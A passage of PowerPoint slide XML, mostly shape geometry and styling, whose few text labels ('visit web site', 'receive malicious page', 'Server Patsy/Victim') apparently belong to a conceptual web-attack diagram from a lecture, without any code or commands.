                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2093363" y="4290014"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4739640"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141833" y="2532063"/>
            <a:ext cx="3345179" cy="751840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3345179" h="751839">
                <a:moveTo>
                  <a:pt x="3344565" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072757" y="3231015"/>
            <a:ext cx="121762" cy="91280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="2583092" y="2558458"/>
            <a:ext cx="2540663" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-187" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336296" y="2842577"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
